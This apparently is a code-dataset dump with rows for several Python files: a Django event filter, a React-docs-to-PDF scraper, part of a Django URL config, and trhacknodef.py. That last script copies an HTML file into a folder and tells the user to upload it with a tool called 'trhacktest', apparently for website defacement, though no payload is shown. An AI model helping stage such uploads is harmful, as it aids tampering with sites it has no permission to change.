hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e542e61606991c722a71cb4d4a6ec9c34ef5c089 | 805 | py | Python | trhacknodef.py | trhacknonimous/TRHACKNONdef | 7cf308f3058dacdf821b8a0574469b687ecc6381 | [
"Apache-2.0"
] | 1 | 2021-12-21T12:25:51.000Z | 2021-12-21T12:25:51.000Z | trhacknodef.py | trhacknonimous/TRHACKNONdef | 7cf308f3058dacdf821b8a0574469b687ecc6381 | [
"Apache-2.0"
] | null | null | null | trhacknodef.py | trhacknonimous/TRHACKNONdef | 7cf308f3058dacdf821b8a0574469b687ecc6381 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
#####DONT CHANGE THIS########
######################
### Script By TRHACKNOnimous
### www.memanon.ml
### Don't Change This.!!!
######################
# Helper script: creates a TRHACKNOnimous folder on shared storage, copies the
# generated HTML script into it, then prints progress messages (in French)
# interleaved with shell sleeps.
import os
import sys
# Every step shells out via os.system; assumes an Android/Termux-like
# environment where /storage/emulated/0/ is the shared-storage root -- TODO confirm.
os.system("clear")
os.system("mkdir TRHACKNOnimous")
os.system("mv TRHACKNOnimous/ /storage/emulated/0/")
os.system("chmod +x /storage/emulated/0/TRHACKNOnimous")
os.system("cp TRHACKNONscript.html /storage/emulated/0/TRHACKNOnimous/")
# NOTE(review): bare "print" is a no-op expression statement under Python 3
# (it only emits a blank line under Python 2, which the shebang suggests).
print
print("tu n'as plus qu'à utiliser un outil comme trhacktest, pour uploader le script que tu viens de creer.")
os.system("sleep 5")
print("script créé dans : /storage/emulated/0/TRHACKNOnimous/TRHACKNONscript.html")
os.system("sleep 2")
print("dont forget anonymous see everythink ;-)")
os.system("sleep 3")
print("[ Script en cours de chargement ]")
| 33.541667 | 109 | 0.68323 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#####DONT CHANGE THIS########
######################
### Script By TRHACKNOnimous
### www.memanon.ml
### Don't Change This.!!!
######################
# Helper script: creates a TRHACKNOnimous folder on shared storage, copies the
# generated HTML script into it, then prints progress messages (in French)
# interleaved with shell sleeps.
import os
import sys
# Every step shells out via os.system; assumes an Android/Termux-like
# environment where /storage/emulated/0/ is the shared-storage root -- TODO confirm.
os.system("clear")
os.system("mkdir TRHACKNOnimous")
os.system("mv TRHACKNOnimous/ /storage/emulated/0/")
os.system("chmod +x /storage/emulated/0/TRHACKNOnimous")
os.system("cp TRHACKNONscript.html /storage/emulated/0/TRHACKNOnimous/")
# NOTE(review): bare "print" is a no-op expression statement under Python 3
# (it only emits a blank line under Python 2, which the shebang suggests).
print
print("tu n'as plus qu'à utiliser un outil comme trhacktest, pour uploader le script que tu viens de creer.")
os.system("sleep 5")
print("script créé dans : /storage/emulated/0/TRHACKNOnimous/TRHACKNONscript.html")
os.system("sleep 2")
print("dont forget anonymous see everythink ;-)")
os.system("sleep 3")
print("[ Script en cours de chargement ]")
| 0 | 0 | 0 |
be769643795a56f48c986114bc2501c3e0c90c43 | 1,024 | py | Python | events/filters.py | Lord-sarcastic/canonical-interview | 5bf208bd1d11114aa69df7d15e5f2606edaacf29 | [
"MIT"
] | null | null | null | events/filters.py | Lord-sarcastic/canonical-interview | 5bf208bd1d11114aa69df7d15e5f2606edaacf29 | [
"MIT"
] | null | null | null | events/filters.py | Lord-sarcastic/canonical-interview | 5bf208bd1d11114aa69df7d15e5f2606edaacf29 | [
"MIT"
] | null | null | null | from django_filters import rest_framework as filters
from .models import Event
| 34.133333 | 87 | 0.670898 | from django_filters import rest_framework as filters
from .models import Event
class EventFilter(filters.FilterSet):
    """Filter set for querying ``Event`` records.

    Exposes filtering by log level, substring (icontains) matches on the
    service / instance / request identifiers, the event action, and an
    open-ended timestamp range via ``timestamp_gt`` / ``timestamp_lt``.
    """

    log_level = filters.ChoiceFilter(
        field_name="log_level", choices=Event.LogLevel.choices
    )
    service_id = filters.CharFilter(field_name="service_id", lookup_expr="icontains")
    instance_id = filters.CharFilter(field_name="instance_id", lookup_expr="icontains")
    request_id = filters.CharFilter(field_name="request_id", lookup_expr="icontains")
    # Bug fix: the field name previously contained a stray trailing backtick
    # ("event_action`"), which targets a model field that does not exist.
    event_action = filters.ChoiceFilter(
        field_name="event_action", choices=Event.Actions.choices
    )
    timestamp_gt = filters.DateTimeFilter(field_name="timestamp", lookup_expr="gt")
    timestamp_lt = filters.DateTimeFilter(field_name="timestamp", lookup_expr="lt")

    class Meta:
        model = Event
        fields = [
            "log_level",
            "service_id",
            "instance_id",
            "request_id",
            "event_action",
            "timestamp_gt",
            "timestamp_lt",
        ]
| 0 | 920 | 23 |
f7bc2a4817d97549ce1f456ae9e4053631da76ca | 4,437 | py | Python | src/convert.py | Yacent/ReactTutorialInPDF | 19ce923f883ddb329f7c8bfa53f60513631b9a6a | [
"MIT"
] | null | null | null | src/convert.py | Yacent/ReactTutorialInPDF | 19ce923f883ddb329f7c8bfa53f60513631b9a6a | [
"MIT"
] | null | null | null | src/convert.py | Yacent/ReactTutorialInPDF | 19ce923f883ddb329f7c8bfa53f60513631b9a6a | [
"MIT"
] | null | null | null | # coding=utf-8
# Main approach:
# 1. Fetch the content of the online tutorial pages
# 2. Grab the ul-list from the index page
# 3. For every <a> inside the ul-list, request that page and write it out
import os
import logging
import requests
import pickle
from weasyprint import HTML
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# global variable
INDEX_URL = 'https://facebook.github.io/react/docs/getting-started.html'
BASE_URL = 'https://facebook.github.io'
TRY_LIMITED = 5
# Configure the logging module; log to both the console and a file
logger = logging.getLogger('pdf_logger')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %('
                              'message)s')
fh = logging.FileHandler('../log/pdf.log')
sh = logging.StreamHandler()
fh.setFormatter(formatter)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
# Configure browser options to speed up scraping
cap = dict(DesiredCapabilities.PHANTOMJS)
cap['phantomjs.page.settings.loadImages'] = False # do not load images
cap['phantomjs.page.settings.userAgent'] = ('Mozilla/5.0 (Windows NT 10.0; '
                                            'WOW64) AppleWebKit/537.36 ('
                                            'KHTML, like Gecko) '
                                            'Chrome/45.0.2454.101 '
                                            'Safari/537.36') # set the user agent
cap['phantomjs.page.settings.diskCache'] = True # enable the browser disk cache
# service_args = [
#     '--proxy=127.0.0.1:1080',
#     '--proxy-type=socks5',
# ]
# Ignore HTTPS certificate errors and route through a local SOCKS5 proxy
service_args=['--ignore-ssl-errors=true',
              '--ssl-protocol=any',
              '--proxy=127.0.0.1:1080',
              '--proxy-type=socks5']
browser = webdriver.PhantomJS(desired_capabilities=cap, service_args=service_args)
browser.set_page_load_timeout(180) # page-load timeout (seconds)
def fetch_url_list():
    """
    Scrape the list of page URLs from the React official tutorial index page.
    :return: hrefs of all anchors found in the nav ul-list (None on failure)
    """
    try:
        page = requests.get(INDEX_URL, verify=True)
        content = page.text
        soup = BeautifulSoup(content, 'lxml')
        url_list = [item['href'] for item in soup.select('.nav-docs-section ul li a')
                    if item['href'].find('https') == -1]
        return url_list
    except Exception as e:
        logger.error('fetch url list failed')
        logger.error(e)
def fetch_page(url, index):
    """
    Fetch the page at the given URL, i.e. one entry of url_list.
    :param url: address of the page to fetch
    :param index: position of the URL inside url_list; used while debugging
                  to see which page failed
    :return: the page source on success, None on failure
    """
    try:
        browser.get(url)
        return browser.page_source
    except Exception as e:
        logger.warning('get page %d %s failed' % (index, url))
        logger.warning(e)
        return None
def build_content():
    """
    Process the page scraped from each URL and write them to a file in order.
    :return: None
    """
    url_list = fetch_url_list()
    print(url_list)
    output = []
    logger.info('there are %s pages' % len(url_list))
    for url_index in range(len(url_list)):
        # Fetching may fail for network or other reasons; on failure retry
        # the same page, at most five times
        try_count = 0
        temp = BASE_URL + url_list[url_index]
        html = fetch_page(temp, url_index)
        while try_count < TRY_LIMITED and html is None:
            html = fetch_page(BASE_URL + url_list[url_index], url_index)
            try_count += 1
        try:
            if html is not None:
                soup = BeautifulSoup(html, 'lxml')
                title = soup.select(".inner-content")[0]
                output.append(str(title))
                logger.info('get page %s success' % url_index)
                # Scraping is slow and failure-prone; the results collected so
                # far could be pickled after every page so that an abnormal
                # exit does not lose earlier work (restore by unpickling):
                # with open('output.dump', 'wb') as f:
                #     pickle.dump(output, f)
        except Exception as e:
            logger.warning('deal page %s %s failed' % (url_index,
                                                       url_list[url_index]))
            logger.warning(e)
    with open('../html/pages.html', 'w') as f:
        f.write('<head><meta charset="utf-8"/></head><body>' + ''.join(
            output) + '</body>')
# Only scrape when the combined HTML has not been produced yet
if not os.path.exists('../html/pages.html'):
    build_content()
if browser:
    browser.quit()
# Render the combined HTML into a single PDF with the site's stylesheets
css = [
    '../css/codemirror.css',
    '../css/react.css',
    '../css/syntax.css'
]
HTML('../html/pages.html').write_pdf('../React教程.pdf', stylesheets=css)
| 31.920863 | 86 | 0.57922 | # coding=utf-8
# Main approach:
# 1. Fetch the content of the online tutorial pages
# 2. Grab the ul-list from the index page
# 3. For every <a> inside the ul-list, request that page and write it out
import os
import logging
import requests
import pickle
from weasyprint import HTML
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# global variable
INDEX_URL = 'https://facebook.github.io/react/docs/getting-started.html'
BASE_URL = 'https://facebook.github.io'
TRY_LIMITED = 5
# Configure the logging module; log to both the console and a file
logger = logging.getLogger('pdf_logger')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %('
                              'message)s')
fh = logging.FileHandler('../log/pdf.log')
sh = logging.StreamHandler()
fh.setFormatter(formatter)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
# Configure browser options to speed up scraping
cap = dict(DesiredCapabilities.PHANTOMJS)
cap['phantomjs.page.settings.loadImages'] = False # do not load images
cap['phantomjs.page.settings.userAgent'] = ('Mozilla/5.0 (Windows NT 10.0; '
                                            'WOW64) AppleWebKit/537.36 ('
                                            'KHTML, like Gecko) '
                                            'Chrome/45.0.2454.101 '
                                            'Safari/537.36') # set the user agent
cap['phantomjs.page.settings.diskCache'] = True # enable the browser disk cache
# service_args = [
#     '--proxy=127.0.0.1:1080',
#     '--proxy-type=socks5',
# ]
# Ignore HTTPS certificate errors and route through a local SOCKS5 proxy
service_args=['--ignore-ssl-errors=true',
              '--ssl-protocol=any',
              '--proxy=127.0.0.1:1080',
              '--proxy-type=socks5']
browser = webdriver.PhantomJS(desired_capabilities=cap, service_args=service_args)
browser.set_page_load_timeout(180) # page-load timeout (seconds)
def fetch_url_list():
    """
    Scrape the list of page URLs from the React official tutorial index page.
    :return: hrefs of all anchors found in the nav ul-list (None on failure)
    """
    try:
        page = requests.get(INDEX_URL, verify=True)
        content = page.text
        soup = BeautifulSoup(content, 'lxml')
        url_list = [item['href'] for item in soup.select('.nav-docs-section ul li a')
                    if item['href'].find('https') == -1]
        return url_list
    except Exception as e:
        logger.error('fetch url list failed')
        logger.error(e)
def fetch_page(url, index):
    """
    Fetch the page at the given URL, i.e. one entry of url_list.
    :param url: address of the page to fetch
    :param index: position of the URL inside url_list; used while debugging
                  to see which page failed
    :return: the page source on success, None on failure
    """
    try:
        browser.get(url)
        return browser.page_source
    except Exception as e:
        logger.warning('get page %d %s failed' % (index, url))
        logger.warning(e)
        return None
def build_content():
    """
    Process the page scraped from each URL and write them to a file in order.
    :return: None
    """
    url_list = fetch_url_list()
    print(url_list)
    output = []
    logger.info('there are %s pages' % len(url_list))
    for url_index in range(len(url_list)):
        # Fetching may fail for network or other reasons; on failure retry
        # the same page, at most five times
        try_count = 0
        temp = BASE_URL + url_list[url_index]
        html = fetch_page(temp, url_index)
        while try_count < TRY_LIMITED and html is None:
            html = fetch_page(BASE_URL + url_list[url_index], url_index)
            try_count += 1
        try:
            if html is not None:
                soup = BeautifulSoup(html, 'lxml')
                title = soup.select(".inner-content")[0]
                output.append(str(title))
                logger.info('get page %s success' % url_index)
                # Scraping is slow and failure-prone; the results collected so
                # far could be pickled after every page so that an abnormal
                # exit does not lose earlier work (restore by unpickling):
                # with open('output.dump', 'wb') as f:
                #     pickle.dump(output, f)
        except Exception as e:
            logger.warning('deal page %s %s failed' % (url_index,
                                                       url_list[url_index]))
            logger.warning(e)
    with open('../html/pages.html', 'w') as f:
        f.write('<head><meta charset="utf-8"/></head><body>' + ''.join(
            output) + '</body>')
# Only scrape when the combined HTML has not been produced yet
if not os.path.exists('../html/pages.html'):
    build_content()
if browser:
    browser.quit()
# Render the combined HTML into a single PDF with the site's stylesheets
css = [
    '../css/codemirror.css',
    '../css/react.css',
    '../css/syntax.css'
]
HTML('../html/pages.html').write_pdf('../React教程.pdf', stylesheets=css)
| 0 | 0 | 0 |
41653f40b4621c9f3cf7ce3238a9ba6174580176 | 11,348 | py | Python | dynadb/urls.py | GPCRmd/GPCRmd | 7dc75359ace4a00c1597bdb7a86ebee17d51f09c | [
"Apache-2.0"
] | 3 | 2019-03-06T13:35:38.000Z | 2020-08-05T15:31:29.000Z | dynadb/urls.py | GPCRmd/GPCRmd | 7dc75359ace4a00c1597bdb7a86ebee17d51f09c | [
"Apache-2.0"
] | null | null | null | dynadb/urls.py | GPCRmd/GPCRmd | 7dc75359ace4a00c1597bdb7a86ebee17d51f09c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django.conf.urls import url,patterns,include #previously: from django.conf.urls import url,patterns
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
from . import views
from haystack.query import SearchQuerySet
from haystack.views import SearchView
from .forms import MainSearchForm
# Pre-built queryset handed to the haystack SearchView below.
sqs = SearchQuerySet().all()
app_name= 'dynadb'
# URL routes for the dynadb app: submission forms, per-entity queries,
# search endpoints and AJAX helpers. Names are referenced via reverse().
urlpatterns = [
    url(r'^reset/$', views.reset_permissions, name="reset_permissions"),
    #url(r'^prueba_varios/$', TemplateView.as_view(template_name='dynadb/pruebamult_template.html'), name="prueba_varios"),
    #url(r'^profile_setting/$', views.profile_setting, name='profile_setting'),
    #url(r'^sub_sim/$', views.sub_sim, name='sub_sim'),
    #url(r'^name/$', views.get_name, name='name'),
    # url(r'^dyndbfiles/$', views.get_DyndbFiles, name='dyndbfiles'),
    url(r'^db_inputform/(?P<submission_id>[0-9]+)?/?$', views.db_inputformMAIN, name='db_inputform'),
    url(r'^before_db_inputform_prev_moddb_inputform/(?P<submission_id>[0-9]+)?/?$', views.db_inputformMAIN, name='before_db_inputform_prev_mod'),
    # url(r'^db_author_information/$', views.get_Author_Information, name='db_author_information'),
    # url(r'^db_dynamics/$', views.get_Dynamics, name='db_dynamics'),
    # url(r'^db_files/$', views.get_FilesCOMPLETE, name='db_files'),
    # url(r'^db_protein/$', views.get_ProteinForm, name='db_protein'),
    # url(r'^db_molecule/$', views.get_Molecule, name='db_molecule'),
    # url(r'^db_molecule/$', views.get_Molecule, name='db_molecule'),
    # url(r'^db_component/$', views.get_Component, name='db_component'),
    # url(r'^db_model/$', views.get_Model, name='db_model'),
    # url(r'^db_compoundform/$', views.get_CompoundForm, name='db_compoundform'),
    # url(r'^your_name/$', views.get_name, name='your_name'),
    # url(r'^thanks/$', views.get_name, name='thanks'),
    # url(r'^admin/', admin.site.urls),
    # --- protein submission and lookup ---
    url(r'^protein/(?P<submission_id>[0-9]+)/$', views.PROTEINview, name='protein'),
    url(r'^protein/(?P<submission_id>[0-9]+)/delete/$', views.delete_protein, name='delete_protein'),
    url(r'^protein/get_data_upkb/?([A-Z0-9-]+)?$', views.protein_get_data_upkb, name='protein_get_data_upkb'),
    url(r'^protein/download_specieslist/$', views.download_specieslist, name='protein_download_specieslist'),
    url(r'^protein/get_specieslist/$', views.get_specieslist, name='protein_get_specieslist'),
    url(r'^protein/get_mutations/$', views.get_mutations_view, name='protein_get_mutations'),
    url(r'^protein/(?P<alignment_key>[0-9]+)/alignment/$', views.show_alig, name='show_alig'),
    # --- read-only queries by database id ---
    url(r'^protein/id/(?P<protein_id>[0-9]+)/$',views.query_protein, name='query_protein'),
    url(r'^protein/id/(?P<protein_id>[0-9]+)/fasta$',views.query_protein_fasta, name='query_protein_fasta'),
    url(r'^molecule/id/(?P<molecule_id>[0-9]+)/$',views.query_molecule, name='query_molecule'),
    url(r'^molecule/id/(?P<molecule_id>[0-9]+)/sdf$',views.query_molecule_sdf,name='query_molecule_sdf'),
    url(r'^compound/id/(?P<compound_id>[0-9]+)/$',views.query_compound, name='query_compound'),
    url(r'^model/id/(?P<model_id>[0-9]+)/$',views.query_model, name='query_model'),
    url(r'^dynamics/id/(?P<dynamics_id>[0-9]+)/$',views.query_dynamics, name='query_dynamics'),
    url(r'^complex/id/(?P<complex_id>[0-9]+)/$',views.query_complex, name='query_complex'),
    url(r'^references/$', views.REFERENCEview, name='references'),
    url(r'^REFERENCEfilled/(?P<submission_id>[0-9]+)/$', views.REFERENCEview, name='REFERENCEfilled'),
    url(r'^PROTEINfilled/(?P<submission_id>[0-9]+)/$', views.PROTEINview, name='PROTEINfilled'),
    # --- submission summaries ---
    url(r'^submission_summary/(?P<submission_id>[0-9]+)/$', views.submission_summaryiew, name='submission_summary'),
    url(r'^protein_summary/(?P<submission_id>[0-9]+)/$', views.protein_summaryiew, name='protein_summary'),
    url(r'^molecule_summary/(?P<submission_id>[0-9]+)/$', views.molecule_summaryiew, name='molecule_summary'),
    url(r'^model_summary/(?P<submission_id>[0-9]+)/$', views.model_summaryiew, name='model_summary'),
    # --- small-molecule submission (plain and "reuse" flows) ---
    url(r'^molecule/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview, name='molecule'),
    url(r'^molecule/(?P<submission_id>[0-9]+)/delete/$', views.delete_molecule, name='delete_molecule'),
    url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.SMALL_MOLECULEreuseview, name='moleculereuse'),
    url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?generate_properties/$', views.generate_molecule_properties, name='generate_molecule_properties_reuse'),
    url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?delete/$', views.delete_molecule, name='delete_molecule_reuse'),
    url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?get_compound_info_pubchem/$', views.get_compound_info_pubchem, name='get_compound_info_pubchem_reuse'),
    url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?get_compound_info_chembl/$', views.get_compound_info_chembl, name='get_compound_info_chembl_reuse'),
    url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?submitpost/$', views.submitpost_view, name='submitpost_reuse'),
    #url(r'^moleculereuse/open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem_reuse'),
    #url(r'^moleculereuse/open_chembl/$', views.open_chembl, name='molecule_open_chembl_reuse'),
    url(r'^moleculereuse/(?:[0-9]+/)open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem_reuse'),
    url(r'^moleculereuse/(?:[0-9]+/)open_chembl/$', views.open_chembl, name='molecule_open_chembl_reuse'),
    url(r'^molecule/(?P<submission_id>[0-9]+)/submitpost/$', views.submitpost_view, name='submitpost'),
    url(r'^molecule/(?P<submission_id>[0-9]+)/generate_properties/$', views.generate_molecule_properties, name='generate_molecule_properties'),
    url(r'^molecule/(?P<submission_id>[0-9]+)/get_compound_info_pubchem/$', views.get_compound_info_pubchem, name='get_compound_info_pubchem'),
    url(r'^molecule/(?P<submission_id>[0-9]+)/get_compound_info_chembl/$', views.get_compound_info_chembl, name='get_compound_info_chembl'),
    url(r'^molecule/open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem'),
    url(r'^molecule/open_chembl/$', views.open_chembl, name='molecule_open_chembl'),
    url(r'^molecule2/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview2, name='molecule2'),
    url(r'^MOLECULEfilled/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview, name='MOLECULEfilled'),
    url(r'^MOLECULEfilled2/$', views.SMALL_MOLECULEview2, name='MOLECULEfilled2'),
    # --- model submission and PDB checking ---
    url(r'^model/(?P<submission_id>[0-9]+)/$', views.MODELview, name='model'),
    url(r'^(?P<form_type>model|dynamics)/(?P<submission_id>[0-9]+)/check_pdb_molecules/$', views.pdbcheck_molecule, name='pdbcheck_molecule'),
    url(r'^(?P<form_type>dynamics)reuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?check_pdb_molecules/$', views.pdbcheck_molecule, name='pdbcheck_molecule'), #######
    url(r'^(?P<form_type>model|dynamics)/(?P<submission_id>[0-9]+)/get_submission_molecule_info/$', views.get_submission_molecule_info, name='get_submission_molecule_info'),
    url(r'^model/(?P<submission_id>[0-9]+)/ajax_pdbchecker/$', views.pdbcheck, name='pdbcheck'),
    url(r'^model/(?P<submission_id>[0-9]+)/search_top/$',views.search_top,name='search_top'), #keep this one in a merge
    url(r'^model/(?P<submission_id>[0-9]+)/upload_model_pdb/$', views.upload_model_pdb, name='upload_model_pdb'),
    url(r'^modelreuse/(?P<submission_id>-?[0-9]+)/(?:[0-9]+/)?$', views.MODELreuseview, name='modelreuse'),
    url(r'^proteinreuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?$', views.PROTEINreuseview, name='proteinreuse'),
    # url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.SMALL_MOLECULEreuseview, name='moleculereuse'),
    # url(r'^modelrow/$', views.MODELrowview, name='modelrow'),
    url(r'^modelreuserequest/(?P<model_id>[0-9]+)/$', views.MODELreuseREQUESTview, name='modelreuserequest'),
    url(r'^MODELfilled/(?P<submission_id>[0-9]+)/$', views.MODELview, name='MODELfilled'),
    #url(r'^ajax_pdbchecker/(?P<submission_id>[0-9]+)/$', views.pdbcheck, name='pdbcheck'),
    # --- search endpoints (haystack + AJAX) ---
    url(r'^search/$', SearchView(template='/protwis/sites/protwis/dynadb/templates/search/search.html', searchqueryset=sqs, form_class=MainSearchForm),name='haystack_search'),
    url(r'^ajaxsearch/',views.ajaxsearcher,name='ajaxsearcher'),
    url(r'^empty_search/',views.emptysearcher,name='emptysearcher'),
    url(r'^autocomplete/',views.autocomplete,name='autocomplete'),
    url(r'^advanced_search/$', views.NiceSearcher,name='NiceSearcher'),
    #url(r'^search_top/(?P<submission_id>[0-9]+)/$',views.search_top,name='search_top'),
    # --- dynamics (MD simulation) submission ---
    url(r'^dynamics/(?P<submission_id>[0-9]+)/$', views.DYNAMICSview, name='dynamics'),
    url(r'^dynamics/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?upload_files/((?P<trajectory>traj)/)?$', views.upload_dynamics_files, name='dynamics_upload_files'),
    url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?upload_files/((?P<trajectory>traj)/)?$', views.upload_dynamics_files, name='dynamics_upload_files'),
    url(r'^dynamics/(?P<submission_id>[0-9]+)/check_trajectories/$', views.check_trajectories, name='dynamics_check_trajectories'),
    url(r'^dynamics/do_analysis/$', views.do_analysis, name='do_analysis'),
    # url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.DYNAMICSreuseview, name='dynamicsreuse'),
    url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.DYNAMICSview, name='dynamicsreuse'),
    url(r'^DYNAMICSfilled/(?P<submission_id>[0-9]+)/$', views.DYNAMICSview, name='DYNAMICSfilled'),
    #url(r'^form/$', views.get_formup, name='form'),
    url(r'^model/carousel/(?P<model_id>[0-9]+)/$', views.carousel_model_components, name='carousel_model_components'),
    url(r'^dynamics/carousel/(?P<dynamics_id>[0-9]+)/$', views.carousel_dynamics_components, name='carousel_dynamics_components'),
    #url(r'^files/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT,}), #this line shouldnt be here
    url(r'^submitted/(?P<submission_id>[0-9]+)/$', views.SUBMITTEDview, name='submitted'),
    url(r'^close_submission/(?P<submission_id>[0-9]+)/$', views.close_submission, name='close_submission'),
    url(r'^datasets/$', views.datasets, name='datasets'),
    url(r'^table/$', views.table, name='table'),
    url(r'^blank/$', TemplateView.as_view(template_name="dynadb/blank.html"), name='blank'),]
    # url(r'^some_temp/$', views.some_view, name='some_temp')
    # url(r'^prueba_varios/$', views.profile_setting, name='PRUEBA_varios'),
# In DEBUG mode serve media and static files directly; in production route
# file downloads through a (possibly login-protected) view instead.
if settings.DEBUG:
    urlpatterns += patterns('',
        url(r'^files/(?P<path>.*)$', 'django.views.static.serve', {
            'document_root': settings.MEDIA_ROOT,
        }),
        url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {
            'document_root': settings.STATIC_ROOT,
        }),
    )
else:
    if settings.FILES_NO_LOGIN:
        serve_files_func = views.serve_submission_files_no_login
    else:
        serve_files_func = views.serve_submission_files
    urlpatterns += patterns('',
        url(r'^files/(?P<obj_folder>[^/\\]+)/(?P<submission_folder>[^/\\]+)/(?P<path>.*)$', serve_files_func, name='serve_submission_files'),
    )
| 79.915493 | 175 | 0.700211 | # -*- coding: utf-8 -*-
from django.conf.urls import url,patterns,include #antes: from django.conf.urls import url,patterns
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
from . import views
from haystack.query import SearchQuerySet
from haystack.views import SearchView
from .forms import MainSearchForm
sqs = SearchQuerySet().all()
app_name= 'dynadb'
urlpatterns = [
url(r'^reset/$', views.reset_permissions, name="reset_permissions"),
#url(r'^prueba_varios/$', TemplateView.as_view(template_name='dynadb/pruebamult_template.html'), name="prueba_varios"),
#url(r'^profile_setting/$', views.profile_setting, name='profile_setting'),
#url(r'^sub_sim/$', views.sub_sim, name='sub_sim'),
#url(r'^name/$', views.get_name, name='name'),
# url(r'^dyndbfiles/$', views.get_DyndbFiles, name='dyndbfiles'),
url(r'^db_inputform/(?P<submission_id>[0-9]+)?/?$', views.db_inputformMAIN, name='db_inputform'),
url(r'^before_db_inputform_prev_moddb_inputform/(?P<submission_id>[0-9]+)?/?$', views.db_inputformMAIN, name='before_db_inputform_prev_mod'),
# url(r'^db_author_information/$', views.get_Author_Information, name='db_author_information'),
# url(r'^db_dynamics/$', views.get_Dynamics, name='db_dynamics'),
# url(r'^db_files/$', views.get_FilesCOMPLETE, name='db_files'),
# url(r'^db_protein/$', views.get_ProteinForm, name='db_protein'),
# url(r'^db_molecule/$', views.get_Molecule, name='db_molecule'),
# url(r'^db_molecule/$', views.get_Molecule, name='db_molecule'),
# url(r'^db_component/$', views.get_Component, name='db_component'),
# url(r'^db_model/$', views.get_Model, name='db_model'),
# url(r'^db_compoundform/$', views.get_CompoundForm, name='db_compoundform'),
# url(r'^your_name/$', views.get_name, name='your_name'),
# url(r'^thanks/$', views.get_name, name='thanks'),
# url(r'^admin/', admin.site.urls),
url(r'^protein/(?P<submission_id>[0-9]+)/$', views.PROTEINview, name='protein'),
url(r'^protein/(?P<submission_id>[0-9]+)/delete/$', views.delete_protein, name='delete_protein'),
url(r'^protein/get_data_upkb/?([A-Z0-9-]+)?$', views.protein_get_data_upkb, name='protein_get_data_upkb'),
url(r'^protein/download_specieslist/$', views.download_specieslist, name='protein_download_specieslist'),
url(r'^protein/get_specieslist/$', views.get_specieslist, name='protein_get_specieslist'),
url(r'^protein/get_mutations/$', views.get_mutations_view, name='protein_get_mutations'),
url(r'^protein/(?P<alignment_key>[0-9]+)/alignment/$', views.show_alig, name='show_alig'),
url(r'^protein/id/(?P<protein_id>[0-9]+)/$',views.query_protein, name='query_protein'),
url(r'^protein/id/(?P<protein_id>[0-9]+)/fasta$',views.query_protein_fasta, name='query_protein_fasta'),
url(r'^molecule/id/(?P<molecule_id>[0-9]+)/$',views.query_molecule, name='query_molecule'),
url(r'^molecule/id/(?P<molecule_id>[0-9]+)/sdf$',views.query_molecule_sdf,name='query_molecule_sdf'),
url(r'^compound/id/(?P<compound_id>[0-9]+)/$',views.query_compound, name='query_compound'),
url(r'^model/id/(?P<model_id>[0-9]+)/$',views.query_model, name='query_model'),
